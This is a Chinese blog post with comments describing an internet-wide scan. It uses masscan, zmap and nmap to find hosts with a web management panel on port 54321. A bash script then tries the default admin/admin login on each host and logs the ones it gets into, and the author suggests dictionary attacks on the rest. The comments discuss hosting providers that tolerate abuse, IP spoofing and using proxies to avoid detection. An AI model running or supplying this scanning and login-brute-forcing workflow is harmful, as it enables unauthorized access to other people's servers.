作者链接记录一次扫描某ui弱密码的过程 1 __2023年1月28日 __3条评论 __297次阅读 __0人点赞 __Tao_Qi 练手玩了一下网络扫描工具,在一台快到期的机器上试了下全网扫描
常用的扫描软件有nmap,zmap,masscan等,以扫描某ui为例 安装 debian下都可以一键安装
[code] apt install -y nmap zmap masscan
[/code]
粗扫 先用这些软件进行端口粗扫,用哪个都行 masscan
[code] masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json
[/code]
zmap
[code] zmap --target-port=54321 --output-file=scan.log
[/code]
nmap
[code] nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log
[/code]
弱口令尝试 早年一些某ui的一键安装脚本采用admin/admin的弱密码,很多人都懒得改,因此可以针对开放默认端口54321的服务器逐一尝试登录
[code] #!/bin/bash
for ip_ad in $(sed -nE 's/.*"ip": "([^"] )".*/\1/p' scan.json); do
if curl --max-time 1 http://$ip_ad:54321; then
res=$(curl "http://${ip_ad}:54321/login" --data-raw 'username=admin&password=admin' --compressed --insecure)
if [[ "$res" =~ .*true.* ]]; then
echo $ip_ad | tee >> week.log
fi
echo $ip_ad | tee >> all.log
fi
done;
[/code]
week.log里面就是所有扫出来的可以弱口令登录的机器,挺容易扫出来的
all.log是改了密码的机器,有兴趣可以尝试进一步字典枚举 论坛不让发神秘链接,就点到为止了
相关链接
* [奇安信攻防社区-如何快速扫描全网端口](<https://forum.butian.net/share/139>)
* [比一比Nmap、Zmap、Masscan三种扫描工具](<https://f002.backblazeb2.com/file/sec-news-backup/files/writeup/www.arkteam.net/_/index.html>)本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议
1.  sduoduo说道: [2023年1月28日 上午11:12](<https://www.5yyx.com/?p=1380#comment-1287>) 一般扫描用的哪家的vps,不会被删机吗 [回复](<https://www.5yyx.com/?p=1380&replytocom=1287#respond>)
2.  DarkHero说道: [2023年1月28日 上午11:14](<https://www.5yyx.com/?p=1380#comment-1288>) @sduoduo #1 正常商家会被删,因为还有两天到期了,所以无所谓了
毛子的机器一般不会管,或者用一些专用的机器,有的甚至提供ip伪造,对这些不是很了解 回复
3.  moamc说道: [2023年1月28日 上午11:54](<https://www.5yyx.com/?p=1380#comment-1289>) 帶上自定義代理就更好了 [回复](<https://www.5yyx.com/?p=1380&replytocom=1289#respond>)发表回复 取消回复电子邮件地址不会被公开。必填项已用 标注 __ __